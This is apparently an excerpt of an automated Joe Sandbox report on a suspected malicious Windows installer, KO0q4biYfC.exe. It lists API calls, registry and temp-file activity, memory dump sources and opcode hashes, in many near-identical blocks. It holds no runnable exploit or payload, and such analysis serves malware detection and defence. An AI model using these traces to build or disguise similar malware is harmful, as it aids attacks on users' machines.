                                              • RegCloseKey.KERNELBASE(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll), ref: 00406307
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: CloseQueryValue
                                              • String ID: Call
                                              • API String ID: 3356406503-1824292864
                                              • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                              • Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
                                              • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                              • Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                              • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                              • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                              • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                              • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                              • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                              • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                              • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                              • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                              • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                              • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                              • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                              • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                              • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                              • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                              • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                              • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                              • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                              • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 004032F2
                                                • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                              • SetFilePointer.KERNELBASE(0000539A,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: FilePointer$CountTick
                                              • String ID:
                                              • API String ID: 1092082344-0
                                              • Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                              • Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
                                              • Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                              • Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 0040205D
                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00402F08,00402F08,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000), ref: 004054AB
                                                • Part of subcall function 00405450: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll), ref: 004054BD
                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                              • LoadLibraryExW.KERNEL32(00000000,?,?,00000001,?), ref: 0040206E
                                              • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,00000001,?), ref: 004020EB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                              • String ID:
                                              • API String ID: 334405425-0
                                              • Opcode ID: 063e47513c4376f19a5a3bfc0780f7f4b653f4b7b25b96f5c752c2c38872185d
                                              • Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
                                              • Opcode Fuzzy Hash: 063e47513c4376f19a5a3bfc0780f7f4b653f4b7b25b96f5c752c2c38872185d
                                              • Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E
                                              APIs
                                              • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                              • Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
                                              • Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                              • Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9
                                              APIs
                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                              • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                              • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                              • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                              APIs
                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                              • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: CloseDeleteValue
                                              • String ID:
                                              • API String ID: 2831762973-0
                                              • Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                              • Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
                                              • Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                              • Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D
                                              APIs
                                              • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                              • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Window$EnableShow
                                              • String ID:
                                              • API String ID: 1136574915-0
                                              • Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                              • Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
                                              • Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                              • Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E
                                              APIs
                                              • GetModuleHandleA.KERNEL32(?,?,?,00403517,0000000A), ref: 004067D4
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                • Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004067B8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                              • String ID:
                                              • API String ID: 2547128583-0
                                              • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                              • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                              • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                              • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\KO0q4biYfC.exe,80000000,00000003), ref: 00405EE2
                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
